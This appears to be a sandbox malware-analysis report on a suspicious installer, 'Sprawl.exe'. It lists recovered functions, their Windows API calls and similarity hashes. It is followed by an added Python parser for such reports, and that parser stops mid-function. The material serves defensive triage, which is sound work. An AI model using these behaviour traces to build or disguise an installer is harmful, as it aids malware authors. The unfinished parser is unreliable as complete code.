• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
• API String ID: 123533781-1369816015
• Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
• Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
• Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
• Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
• Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                                                            • Opcode Fuzzy Hash: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
                                                                                                                            • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
• Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
• Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
• Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
• Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
• Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
• Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
APIs
• CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
• GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
• GetSysColor.USER32(?), ref: 0040412B
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
• lstrlenA.KERNEL32(?), ref: 0040414C
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
• GetDlgItem.USER32(?,0000040A), ref: 004041D2
• SendMessageA.USER32(00000000), ref: 004041D5
• GetDlgItem.USER32(?,000003E8), ref: 00404200
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
• LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
• SetCursor.USER32(00000000), ref: 00404258
• ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
• LoadCursorA.USER32(00000000,00007F00), ref: 00404278
• SetCursor.USER32(00000000), ref: 0040427B
• SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
• SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
Strings
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: (@@$(N$N$Space available: $open
• API String ID: 3615053054-1322021202
• Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
• Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
• Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
• Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,Vulkanbyernes Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$Vulkanbyernes Setup
• API String ID: 941294808-807586904
• Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
• Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
APIs
• lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
• GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
  • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
  • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
• GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
• wsprintfA.USER32 ref: 00405AEF
• GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
• SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
• GlobalFree.KERNEL32(00000000), ref: 00405BD8
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
  • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004059A6
  • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                                                            • API String ID: 222337774-4148678300
                                                                                                                            • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                                                                            • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
• Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
• CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
• CharNextA.USER32(?,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
• CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
Strings
• "C:\Users\user\Desktop\Sprawl.exe", xrefs: 00405FD6
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
• *?|<>/":, xrefs: 00405FE2
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\Sprawl.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-605302055
• Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
• Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
• Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00403F98
• GetSysColor.USER32(00000000), ref: 00403FB4
• SetTextColor.GDI32(?,00000000), ref: 00403FC0
• SetBkMode.GDI32(?,?), ref: 00403FCC
• GetSysColor.USER32(?), ref: 00403FDF
• SetBkColor.GDI32(?,?), ref: 00403FEF
• DeleteObject.GDI32(?), ref: 00404009
• CreateBrushIndirect.GDI32(?), ref: 00404013
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
• Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
APIs
• lstrlenA.KERNEL32(00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
• lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,762323A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
• lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,762323A0), ref: 00404FA4
• SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
• Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
• Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
• GetMessagePos.USER32 ref: 00404836
• ScreenToClient.USER32(?,?), ref: 00404850
• SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
Strings
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
• Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
• Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
• MulDiv.KERNEL32(000D6E84,00000064,000D6E88), ref: 00402BC5
• wsprintfA.USER32 ref: 00402BD5
• SetWindowTextA.USER32(?,?), ref: 00402BE5
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
Strings
• verifying installer: %d%%, xrefs: 00402BCF
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
• Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                                                            • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                                            • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
• GlobalFree.KERNEL32(?), ref: 0040276F
• GlobalFree.KERNEL32(00000000), ref: 00402782
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
• Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
• Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
• Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
APIs
• SetWindowTextA.USER32(00000000,Vulkanbyernes Setup), ref: 00403A0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: TextWindow
• String ID: "C:\Users\user\Desktop\Sprawl.exe"$(N$1033$Vulkanbyernes Setup
• API String ID: 530164218-3546199828
• Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
• Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
• Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
• Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
• RegCloseKey.ADVAPI32(?), ref: 00402AE0
• RegCloseKey.ADVAPI32(?), ref: 00402B05
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
• Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
• Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
• Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
APIs
• GetDlgItem.USER32(?), ref: 00401CE2
• GetClientRect.USER32(00000000,?), ref: 00401CEF
• LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
• SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
• DeleteObject.GDI32(00000000), ref: 00401D2D
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
• Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
• Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
• Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
APIs
• GetDC.USER32(?), ref: 00401D3B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
• ReleaseDC.USER32(?,00000000), ref: 00401D68
• CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
• Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
• Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
• Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
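The function summaries above each list the imported API calls of one recovered function with their call-site addresses, the memory dump the code was lifted from, and the similarity identifiers (API String ID, Opcode ID, Instruction Fuzzy Hash) that let the same function be matched across reports of the same family. The Python script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses blocks in that layout into records, tolerates the "Download File" link text left over from the HTML, and flags functions whose import set covers a given pattern, here the RegEnumKeyA plus RegDeleteKeyA pairing of the block at 00402A9B, which is the shape of a routine that enumerates and removes registry keys. The sample text is copied from two blocks on this page; the FunctionBlock and ApiCall structures, the field names and the helper functions are the example's own.

```python
"""Added example: parse Joe Sandbox per-function summary blocks and pivot on them."""
import re
from dataclasses import dataclass, field

# Constructed sample: two function blocks copied from this report, in the layout
# the page uses (bullets, "Download File" link residue, an empty "String ID").
SAMPLE = """\
APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
• RegCloseKey.ADVAPI32(?), ref: 00402AE0
• RegCloseKey.ADVAPI32(?), ref: 00402B05
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
• Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
APIs
• GetDC.USER32(?), ref: 00401D3B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
• ReleaseDC.USER32(?,00000000), ref: 00401D68
• CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
"""


@dataclass
class ApiCall:
    name: str     # imported function, e.g. RegDeleteKeyA
    module: str   # DLL the report resolved it to, e.g. ADVAPI32
    args: list    # argument values as the report shows them ("?" = unknown)
    ref: int      # call-site address inside the dumped image


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0
    similarity: dict = field(default_factory=dict)

    def api_names(self):
        return {c.name for c in self.apis}

    def pivot_key(self):
        """Identifiers worth searching for in other reports of the same family."""
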